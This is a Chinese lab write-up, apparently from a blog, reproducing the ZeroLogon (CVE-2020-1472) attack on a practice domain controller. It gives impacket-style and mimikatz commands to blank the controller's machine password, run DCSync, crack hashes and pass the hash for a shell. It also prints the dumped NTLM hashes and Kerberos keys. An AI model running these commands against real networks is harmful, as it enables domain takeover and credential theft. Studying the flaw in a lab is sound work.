ZeroLogon 练习

靶场介绍

  1. 网络地址
1
2
目标地址:192.168.111.100
本机地址:192.168.111.25
  1. 【复现】CVE-2020-1472 ZeroLogon 漏洞

    漏洞概述

    Zerologon(CVE-2020-1472)是Netlogon远程协议的一个特权提升漏洞,可以在不提供任何据的情况下通过身份验证,并实现域内提权。

    环境共有两台机器,用于测试两种情况,分别为攻击机在域中以及不在域中的情况 靶场环境来自:https://suhaynn.github.io/2025/06/21/【复现】CVE-2020-1472 ZeroLogon漏洞/#靶场环境

    域内机器账号密码请前往来源获取

WP:https://suhaynn.github.io/2025/06/21/%E3%80%90%E5%A4%8D%E7%8E%B0%E3%80%91CVE-2020-1472%20ZeroLogon%E6%BC%8F%E6%B4%9E/#%E6%A3%80%E6%B5%8B%E6%98%AF%E5%90%A6%E5%AD%98%E5%9C%A8%E6%BC%8F%E6%B4%9E-1

知识点

Zerologon(CVE-2020-1472)是 Netlogon 远程协议的一个特权提升漏洞,可以在不提供任何凭据的情况下通过身份验证,并实现域内提权。

该漏洞的最常见的利用方法是调用 Netlogon 中的 RPC 函数 NetrServerPasswordSet2 来重置域控的机器账户的密码,从而以域控制器的机器账户的身份进行 Dcsync 获取域管权限。

注意,这里重置的是域控机器账户的密码,与域管的密码无关**,**该密码由系统随机生成,密码强度是 120 个字符,并且会定时更新。

机器账户是不允许登录的,所以不能直接通过重置后的机器账户来登陆域控制器。但是,域控制器的机器账户在默认情况下拥有 DCSync 权限,因此可以通过 DCSync 攻击导出域管理员甚至所有用户密码的哈希值,进而获取域控权限

这个漏洞完整的利用,需要域控开启 135 和 445 端口。

打靶过程

impacket攻击

fscan 扫一下

1
fscan.exe -h 192.168.111.100

image-20260907094806563

135 和 445 端口都是开启的,主机名是:masterpc

继续利用 CVE-2020-1472 ZeroLogon 漏洞,借助 AI 写了一个利用脚本

检测漏洞

1
python CVE-2020-1472.py check masterpc 192.168.111.100

存在漏洞

image-20260907134854306

置空机器账户密码

1
python CVE-2020-1472.py exploit masterpc 192.168.111.100 --force

image-20260907134906196

  1. DCSync 抓 hash
1
python CVE-2020-1472.py dcsync masterpc 192.168.111.100 --all

image-20260907134958230

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
Administrator:500:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:5d6179aa303cb80767dd808af8e7949b:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
masteruser:1000:aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218:::
myd.com\alex:1107:aad3b435b51404eeaad3b435b51404ee:d92b40c276ae016de921403adf6e2714:::
myd.com\tom:1112:aad3b435b51404eeaad3b435b51404ee:d92b40c276ae016de921403adf6e2714:::
MASTERPC$:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN7PC$:1104:aad3b435b51404eeaad3b435b51404ee:fba0ef9bd33b6d683c4c5afef2420347:::
WIN10PC$:1108:aad3b435b51404eeaad3b435b51404ee:b80ec1bd8d779daf7c8aba0df0b0b3a5:::
BACKUPPC$:1110:aad3b435b51404eeaad3b435b51404ee:0a24d18aa71033fc7475b36374cfa646:::
SER12PC$:1113:aad3b435b51404eeaad3b435b51404ee:821d0d4ef0c0af19fb9ae76fb2423aaf:::
[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:673497346e4a840a2937edc9f20c9dadf8e3fa36762f8a80d10dc6c899fd30bd
krbtgt:aes128-cts-hmac-sha1-96:2f8352e16bd2241be1654915d81a2d7d
krbtgt:des-cbc-md5:8331fb76e96d1ab6
myd.com\alex:aes256-cts-hmac-sha1-96:95e2507abb2745ac5c3bf174b623848fbf575e30b3ce5e5004d961c45523560f
myd.com\alex:aes128-cts-hmac-sha1-96:6d03b9b5f98c3121ebd1e2df6473f851
myd.com\alex:des-cbc-md5:a4674c8f9dd640cd
myd.com\tom:aes256-cts-hmac-sha1-96:ee3384a48741df4ac23638b1bda36376e1d48385915f8381ae7c3520eaa6b3c9
myd.com\tom:aes128-cts-hmac-sha1-96:77a2c45be49f9b67c29971e111d77219
myd.com\tom:des-cbc-md5:ae8ccb19cd0ed675
MASTERPC$:aes256-cts-hmac-sha1-96:3054d8539c1cc2ad543e5122911c20741dac437a06f0ec91926d8fdea6c4892a
MASTERPC$:aes128-cts-hmac-sha1-96:59b4146c6c92b85853c2463904da4fd3
MASTERPC$:des-cbc-md5:d34f02fd58dc5e79
WIN7PC$:aes256-cts-hmac-sha1-96:0ce42c9e2b4dae863e9c89fcb544044b6ad0ab163a9c5ec0654a387188401758
WIN7PC$:aes128-cts-hmac-sha1-96:cf5f272afedad5da97673bb134f8e624
WIN7PC$:des-cbc-md5:f13e5415b6e00db6
WIN10PC$:aes256-cts-hmac-sha1-96:ca924d18a9cb0e0c0b18c8ef2d3cf570ba9a387ffa066b7d0c594183fa0c44ba
WIN10PC$:aes128-cts-hmac-sha1-96:22d54361b292d21d619a14c0da816ed6
WIN10PC$:des-cbc-md5:bc6ee3dc3e851934
BACKUPPC$:aes256-cts-hmac-sha1-96:2e19705625a7e08e20cd7b817ed4168a36535ce97f7b2d66621b47d092697135
BACKUPPC$:aes128-cts-hmac-sha1-96:b6a9c337be3415c0290988821199544c
BACKUPPC$:des-cbc-md5:ae4601f851c76145
SER12PC$:aes256-cts-hmac-sha1-96:4b23645c727fad5699b4adb4b44e92b1813e97026c8cb4fbba99db984e8585b1
SER12PC$:aes128-cts-hmac-sha1-96:9b01c72dbc5f89c4c7d13038715a9bf8
SER12PC$:des-cbc-md5:3d1a1ada68c72f9e

拿到了所有用户的 hash 了,其中 masterpc$ 的NTML hash已经被置空了

image-20260907135232080

Administrator 有解开的可能

image-20260907135313356

借用强哥的账号,在棉花糖可以解出来:https://bdziyi.com/mmd5/,密码是:master@123.

image-20260907135415527

实际上WP里写了:

image-20260908093210727

也可以不解密,有了 hash 可以进行 PTH 攻击,可以用 wmiexec.py,是 Python 自带的

1
2
3
python wmiexec.py -hashes 域管理员hash c域名/Administrator@域控IP

python wmiexec.py -hashes aad3b435b51404eeaad3b435b51404ee:ec0df45863a3751d56ba6df1e72f7218 myd.com/Administrator@192.168.111.100

拿到 shell

image-20260907144408502

拿到flag

image-20260907144657113

1
flag{48255d2fc759b14f4127fda7c5a86d89}

mimikatz攻击

mimikatz工具地址:https://github.com/gentilkiwi/mimikatz/

先检测一下漏洞是否存在

1
mimikatz.exe "privilege::debug" "lsadump::zerologon /target:192.168.111.100 /account:masterpc$" "exit"

image-20260908085835478

确实存在漏洞,继续重置哈希,攻击机在域中的话可以用:/target:masterpc.myd.com

1
mimikatz.exe "lsadump::zerologon /target:masterpc.myd.com /ntlm /null /account:masterpc$ /exploit" "exit"

这里用的宿主机,可以直接用 IP

1
mimikatz.exe "lsadump::zerologon /target:192.168.111.100 /ntlm /null /account:masterpc$ /exploit" "exit"

image-20260908090649257

最后导出域管hash

注意:这里/dc 后面一定要跟域名格式的域控的 FQDN,所以这就意味着,当前攻击的机器必须将 DNS 服务器指为域控,这样才能解析

1
mimikatz.exe "lsadump::dcsync /csv /domain:myd.com /dc:masterpc.myd.com /user:administrator /authuser:masterpc$ /authpassword:\"\" /authntlm" "exit"

我这里宿主机不在域内,失败了

image-20260908092046567

贴一下 WP 里的图

拿到:ec0df45863a3751d56ba6df1e72f7218

然后就可以远程连接域控 PTH 攻击

用刚刚导出来的 administrator 用户的哈希连接域控,这一步需要 privilege::debug 提权

1
mimikatz.exe "privilege::debug" "sekurlsa::pth /user:administrator /domain:192.168.111.100 /rc4:ec0df45863a3751d56ba6df1e72f7218" "exit"

image-20260908092444608

恢复域控的机器用户哈希

https://suhaynn.github.io/2025/06/21/%E3%80%90%E5%A4%8D%E7%8E%B0%E3%80%91CVE-2020-1472%20ZeroLogon%E6%BC%8F%E6%B4%9E/#%E6%81%A2%E5%A4%8D%E5%9F%9F%E6%8E%A7%E7%9A%84%E6%9C%BA%E5%99%A8%E7%94%A8%E6%88%B7%E5%93%88%E5%B8%8C


ZeroLogon 练习
https://yschen20.github.io/2026/09/08/ZeroLogon-练习/
作者
Suzen
发布于
2026年9月8日
更新于
2026年9月8日
许可协议